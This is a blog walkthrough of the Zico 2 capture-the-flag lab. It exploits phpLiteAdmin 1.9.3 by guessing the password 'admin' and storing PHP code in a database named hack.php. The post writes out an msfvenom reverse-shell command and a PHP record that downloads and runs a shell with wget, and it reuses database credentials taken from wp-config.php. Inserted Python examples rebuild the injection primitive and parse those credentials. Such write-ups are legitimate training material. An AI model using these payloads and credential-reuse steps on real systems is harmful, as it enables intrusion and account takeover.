Thursday, 26 October 2017

Zico 2 challenge

Hello all,

Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?

Let's try to verify it.

First of all, we should scan our target.

I scanned only the top 100 ports, because scanning all 65535 ports takes a lot of time.

As always, let's begin the pentest with the web application.

OK, let's enumerate it using dirb.

/dbadmin/ looks very interesting... Let's take a closer look at it.

Let's click on test_db.php.

Hmmm, a password prompt... We don't know any password. But we can see that this is phpLiteAdmin v1.9.3, and as far as I know this version is vulnerable to remote PHP code injection (Exploit-DB 24044): anyone who can log in may create a database with an arbitrary file name, such as one ending in .php, and store PHP code in it.

Excellent, so let's also try to guess the password for the admin panel.
Yes! "admin" is a valid password.

Great! Now we can use our exploit.
We have created a new database named hack.php.
The database hack.php contains only one table with one record. The record is <?php phpinfo(); ?>, and since the database file sits under the web root as hack.php, requesting it makes the PHP interpreter execute the record. Let's execute it.
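To show why that works, here is an added example (not code from the original post, nor from phpLiteAdmin) that rebuilds the primitive locally: it creates a SQLite database named hack.php with a single row holding the PHP tag, then reads the raw file back to show that the tag sits verbatim among the binary page data, which is exactly what the PHP interpreter sees when the web server serves the file as .php (everything outside <?php ... ?> is echoed as literal output, only the tag is executed). The table and column names are arbitrary, and safe_db_name() is a hardened name check written for this example, of the allowed-extensions kind that later phpLiteAdmin releases added.

```python
"""Why a phpLiteAdmin database named hack.php runs as PHP (added example)."""
import os
import re
import shutil
import sqlite3
import tempfile

PHP_TAG_RE = re.compile(rb"<\?php.*?\?>", re.DOTALL)

# Extensions a database file may legitimately end in, and script extensions
# that must not appear anywhere in the name: Apache's multi-extension handling
# (AddHandler) treats hack.php.db as PHP too, so checking the last part is not enough.
ALLOWED_EXTENSIONS = {"db", "db3", "sqlite", "sqlite3"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def build_db(path: str, payload: str) -> None:
    """Create a SQLite database at `path` whose single row holds `payload`,
    as phpLiteAdmin does when a table is created and a record inserted via its UI.
    Table/column names are arbitrary (assumption for this example)."""
    conn = sqlite3.connect(path)
    try:
        conn.execute("CREATE TABLE t (c TEXT)")
        conn.execute("INSERT INTO t (c) VALUES (?)", (payload,))
        conn.commit()
    finally:
        conn.close()


def is_sqlite_file(path: str) -> bool:
    """True when the file starts with the SQLite magic header."""
    with open(path, "rb") as fh:
        return fh.read(16) == b"SQLite format 3\x00"


def php_tags_in_file(path: str) -> list:
    """PHP tags found verbatim in the raw bytes: what the interpreter would
    execute if this file were served as .php (TEXT values are stored uncompressed)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [m.group(0).decode("utf-8") for m in PHP_TAG_RE.finditer(data)]


def safe_db_name(name: str) -> bool:
    """Allowlist check for a user-chosen database file name: rejects path
    separators and NULs, a final extension that is not a SQLite one, and a
    script extension anywhere in the name."""
    if not name or any(ch in name for ch in "/\\\x00"):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(p in SCRIPT_EXTENSIONS for p in parts[:-1])


def demo(payload: str = "<?php phpinfo(); ?>") -> dict:
    """Build hack.php in a temporary directory and report what PHP would see."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "hack.php")  # attacker-chosen name, as in the post
    try:
        build_db(path, payload)
        return {
            "sqlite_header": is_sqlite_file(path),
            "php_tags": php_tags_in_file(path),
            "name_allowed_by_check": safe_db_name("hack.php"),
        }
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The same trick carries the dropper used later in the post: any `<?php exec("..."); ?>` stored as a row value survives verbatim in the file, so the only thing that prevents the attack is refusing the file name, not the content.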

Great! The PoC works. Now let's change the record from the PoC to a reverse shell.
I tried to upload and execute a PHP reverse shell, but without success. So let's try playing with an ELF file instead.
We first upload a PHP record that is responsible for fetching the ELF file onto the server with wget; then we can execute the ELF file from there.

Generated payload:
msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=53 -f elf -o shell

Record in the table:
<?php exec("cd /tmp; wget; chmod a+x shell; ./shell"); ?>

So now we have to start a Metasploit multi/handler listener for the meterpreter payload on port 53, then request hack.php again to trigger the record.

Excellent, we have got a limited shell as www-data.
In the /home/zico/wordpress directory I found the wp-config.php file, which contains the database password for the zico user. Let's try to reuse it to switch from the www-data user to the zico user with su.
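The credential-reuse step above depends on pulling the right value out of wp-config.php. As an added example (not code from the original post), here is a small parser for the define('KEY', 'value') lines WordPress writes; SAMPLE_WP_CONFIG is a constructed file in that shape with made-up values, including a commented-out stale entry and an escaped quote, so the parser has to handle both quote styles and PHP's escape rules rather than a bare grep.

```python
"""Extract database credentials from a wp-config.php (added example)."""
import re

# Constructed sample in the shape WordPress writes; every value is made up.
SAMPLE_WP_CONFIG = r"""<?php
/** Database settings (constructed sample) */
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
// define('DB_PASSWORD', 'old-constructed-pass');
define( 'DB_PASSWORD', 'it\'s-Constructed-Pass-1' );
define("DB_HOST", "localhost");
define('DB_CHARSET', 'utf8');
$table_prefix = 'wp_';
"""

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")

# define( 'KEY' , 'value' ) with either quote style; the value may contain
# backslash escapes, which _unescape() resolves afterwards.
DEFINE_RE = re.compile(
    r"""define\(\s*(?P<kq>['"])(?P<key>[A-Za-z_][A-Za-z0-9_]*)(?P=kq)\s*,\s*"""
    r"""(?P<vq>['"])(?P<val>(?:\\.|(?!(?P=vq)).)*)(?P=vq)\s*\)"""
)

# Escapes honoured inside PHP double-quoted strings (hex/octal/unicode
# escapes are left as written; they are rare in config files).
_DQ_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
               "\\": "\\", '"': '"', "$": "$"}


def _strip_comments(text: str) -> str:
    """Drop /* */ blocks and full-line // or # comments so that a
    commented-out define() is not mistaken for the live one."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    keep = [ln for ln in text.splitlines()
            if not ln.lstrip().startswith(("//", "#"))]
    return "\n".join(keep)


def _unescape(raw: str, quote: str) -> str:
    """Resolve PHP string escapes: single-quoted strings only honour
    backslash-backslash and backslash-quote; double-quoted strings honour
    the escapes listed in _DQ_ESCAPES."""
    if quote == "'":
        return re.sub(r"\\([\\'])", r"\1", raw)
    return re.sub(r"\\(.)", lambda m: _DQ_ESCAPES.get(m.group(1), m.group(0)), raw)


def extract_defines(text: str) -> dict:
    """Return every live define('KEY', 'value') in the file as a dict."""
    found = {}
    for m in DEFINE_RE.finditer(_strip_comments(text)):
        found[m.group("key")] = _unescape(m.group("val"), m.group("vq"))
    return found


def db_credentials(text: str) -> dict:
    """The four values needed to connect to the database, or to try for
    password reuse against the matching local user (DB_USER)."""
    defs = extract_defines(text)
    return {k: defs.get(k) for k in DB_KEYS}


if __name__ == "__main__":
    for key, val in db_credentials(SAMPLE_WP_CONFIG).items():
        print(f"{key} = {val}")
```

Note that DB_USER and the local account happen to share the name zico here, which is what makes the reuse attempt obvious; in general the two need not match, and the password is worth trying against every local user found in /etc/passwd.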